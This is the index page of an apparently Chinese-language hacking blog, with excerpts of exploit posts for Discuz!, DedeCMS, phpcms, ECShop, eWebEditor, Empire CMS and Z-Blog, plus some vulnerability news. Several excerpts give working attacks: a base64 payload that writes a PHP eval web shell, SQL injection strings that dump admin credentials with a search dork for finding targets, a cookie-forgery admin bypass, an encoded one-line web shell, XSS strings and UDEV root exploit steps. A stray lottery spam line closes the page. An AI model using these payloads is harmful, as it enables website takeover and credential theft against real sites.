河北網絡安全博客

河北博客是一個關注網絡安全、網站設計、網站推廣、網站優化SEO、網站建設的河北地方博客。


[置頂] 關于河北博客【想了解河北博客的朋友請看這里】

[置頂] 站長朋友請看這里【永久置頂】

DZ!2.5 后臺拿 WebShell 方法 DZ!2.5 后臺拿 shell(圖)

buger

        1.注冊任意賬戶2.登陸用戶,發表blog日志(注意是日志)3.添加圖片,選擇網絡圖片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}  具體方法查看日志

河北博客:最新DEDECMS 漏洞0day 影響版本(dede5.5、dede5.6)

buger

影響版本:dedecms5.5-5.6
官方網站:http://www.dedecms.com
漏洞類型:設計錯誤
漏洞代碼:member\index_do.php

z-blog 1.8 最新跨站XSS漏洞及修復方法

buger

漏洞文件:cmd.asp

新網被指存漏洞導致域名被盜 用戶稱考慮索賠

buger

11月17日消息,今日有域名界人士向TechWeb反映,眾多在新網注冊的CN域名被盜,包括51.cn、61.cn、168.cn、188.cn等極具價值的域名。域名界人士認為,被盜原因很可能是新網系統存在重大漏洞。

phpcms2008 sp3注入漏洞

buger

phpcms最新版注入漏洞 注入yp/company.php?where=%23
進入后臺訪問
http://www.jzq8.com/admin.php?mod=phpcms&file=safe&action=see_code&files=kindle.php

ECShop 2.7.2 最新任意用戶登陸漏洞0day

buger

     ECShop 2.7.2正式版的源代碼, 且低級漏洞。這個漏洞可以讓任何人以任何用戶身份登錄到ECShop前臺! 漏洞的影響 ECShop 2.7.2,ECShop 2.7.1 不受影響 漏洞的出現 漏洞出現在/include/init.php文件的512行左右, 代碼如下

phpcms2008 yp.php 注入利用 Xday EXP

buger

測試方法: 保存以下代碼為phpcms2008.php。安裝php,進入php目錄。執行php php2008.php localhost /yq 本地測試成功。

瑞星防火墻監測出華軍軟件園被掛馬(附圖)

buger

      被掛馬頁面1:http://www.onlinedown.net/soft/3011.htm  被掛馬頁面2:http://www.onlinedown.net/softdown/3011_2.htm  不知道這次是華軍真的被掛馬呢還是誤報

游九(U9)網DOTA專題站搜索頁跨站漏洞

buger

代碼如下,括號任意內容
http://dota.uuu9.com/Search.aspx?keyword=<script>alert("http://www.nfwwds.tw")</script>

UCHOME1.5 XSS漏洞

buger

測試代碼: 需要先登入會員
http://u.discuz.net//home//space.php?<script>alert(/hiphop/)</script></script>

MSN Editor 漏洞

buger

這個編輯器相當的簡陋,下午拿站的時候碰到了一個,沒有數據庫備份,也沒有什么可以直接上傳webshell的地方,簡陋到只有一個editor的界面。簡單說下利用的方法吧。

新云4.0最新0day

buger

訪問ask目錄,注冊用戶,
在密碼問題的地方插入加密后的一句話:┼攠數畣整爠煥敵瑳∨≡┩愾
注冊成功后連接默認數據庫:ask/data/ask_newasp.asa 密碼:a

ewebeditor后臺通殺漏洞

buger

今天看了下ewebeditor php的版本,記得以前看了php版,那個版本比較低,連后臺都沒
今天下了個3.8的,竟然找出一點令人興奮的東西出來…
php版本后臺是調用../ewebeditor/admin/config.php,大家去看下源碼就知道
利用方法:首先當然要找到登陸后臺,默認是../eWebEditor/admin/login.php,進入后臺后隨便輸入一個用戶和密碼,當然會提示出錯了.
這時候你清空瀏覽器的url,然后輸入 javascript:alert(document.cookie=”adminuser=”+escape(”admin”)); javascript:alert(document.cookie=”adminpass=”+escape(”admin”)); javascript:alert(document.cookie=”admindj=”+escape(”1″));后三次回車,清空瀏覽器的 url,大家注意了,這次輸入的url要注意,我們這次要輸入的文件都是在正常情況下經過驗證才能瀏覽的文件如../ewebeditor/admin /default.php
...

3389端口無法登錄的5種原因

windows

        1、服務器在內網。
  2、做了tcp/ip篩選。
  先執行下面cmd命令:
  cmd /c regedit -e c:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip,導出注冊表里關于TCP/IP篩選的第一處
  cmd /c regedit -e c:\2.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip,導出注冊表里關于TCP/IP篩選的第二處
...

帝國CMS系統注入漏洞

buger

GG關鍵字:inurl:e/tool/gbook/?bid=1
主要填寫您的姓名和聯系郵箱這兩處,其它的隨便填。
您的姓名:縗\
聯系郵箱:,1,1,1,(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where userid=1),1,1,1,0,0,0)/*
然后進行提交返回頁面即爆出用戶名密碼。

又一個免費電話!

download

http://www.alicall.com/freevoip.htm

正在搞活動 注冊給6-100分鐘的電話時間

Z-BLOG XSS Vulnerabilities漏洞

buger

漏洞描述:
Z-BLOG后臺登陸錯誤信息顯示文件c_error.asp,雖然對跳轉URL的參數sourceurl進行了編碼,但沒有判斷鏈接頭部,執行了javascript偽協議,造成跨站腳本漏洞。
漏洞測試:

http://www.xxx.com/function/c_error.asp?errorid=7&number=0&description=&source=&sourceurl=javascript:alert(document.cookie)
...

PHP萬能密碼

buger

神秘小強&1943
說實話如果一個網站的前臺都是注入漏洞,那么憑經驗,萬能密碼進后臺的幾率基本上是

百分之百。

     可是有的人說對PHP的站如果是GPC魔術轉換開啟,就會對特殊符號轉義,就徹底杜絕了

PHP注入。

     其實說這話的人沒有好好想過,更沒有嘗試過用萬能密碼進PHP的后臺。

     其實GPC魔術轉換是否開啟對用萬能密碼進后臺一點影響也沒有。

...

php+mysql如何爆頁面絕對路徑

buger

1、加引號’這個最常用 


2、變參數類型,比如把id=1改為id=a等 有時很有效果 


3、亂添數據,比如把id=1改為id=1111111111111111111111......等 有時很有效果 


4、text.php?aa[]=xx 


5、利用php的max_execution_time, 能將絕對路徑顯示出來. 這機率非常小.適合在服務器負荷嚴重的時候測試. 

...

UDEV本地溢出漏洞利用手記

buger

來源:職業欠錢
  這段時間UDEV溢出漏洞很火,在虛擬機上做了下試驗,發現確實很好用。
貌似通殺范圍很廣

1. 將http://www.milw0rm.com/exploits/8478 保存為一個shell文件,也可以隨便命名,例如我后面命名為a

2. 查找udev的第一個socket的PID,可以通過執行如下命令獲得:
   cat /proc/net/netlink

3. 將出現在第一行的PID減去1,作為參數,例如
...

微軟爆嚴重漏洞 網民在線看電影可能中毒

buger

微軟公司近日發布安全建議證實,WindowsXP等操作系統存在一個“DirectShow視頻開發包”漏洞。一旦該0day漏洞被黑客利用,當網民在線觀看經黑客惡意構造的視頻文件時,電腦將自動下載和運行木馬程序。

DirectShow是微軟公司推出的新一代基于網絡流媒體處理的開發包,廣泛支持Asf、Mpeg、Avi、Dv、Mp3、Wave等各種媒體格式。此次爆出的漏洞是一個動態鏈接庫文件在使用濾鏡進行“著色”時產生的,當用戶在線觀看惡意視頻文件時,Realplayer、暴風影音、qq影音、WindowsMediaPlayer、Quicktime等主流播放器都會觸發該漏洞,從而使自己的網游、網銀面臨被盜風險。除WindowsVista及Window7用戶外,WindowsXP、Windows2000及Windows2003操作系統的用戶均會受這一漏洞的影響。目前,微軟公司已在其官方網站發布安全建議,而正式補丁預計將在未來兩個月內面向全球Windows用戶同時發布。

...
分頁:1[2][3][4]

訂閱河北博客

  • 訂閱我的博客:訂閱我的博客
  • 關注新浪微博:關注新浪微博
  • 關注騰訊微博:關注騰訊微博
  • google reader
  • 鮮果
  • 抓蝦
  • QQ邮箱

河北博客站內搜索

河北博客相關鏈接

河北博客熱文排行

Powered By kingwq's blog

本站采用創作共用版權協議, 要求署名、非商業用途和保持一致. 轉載本站內容必須也遵循“署名-非商業用途-保持一致”的創作共用協議.
This site is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 2.5 License.冀ICP備09002514號.Copyright www.nfwwds.tw.2010

云南快乐十分走势图基本走势图百度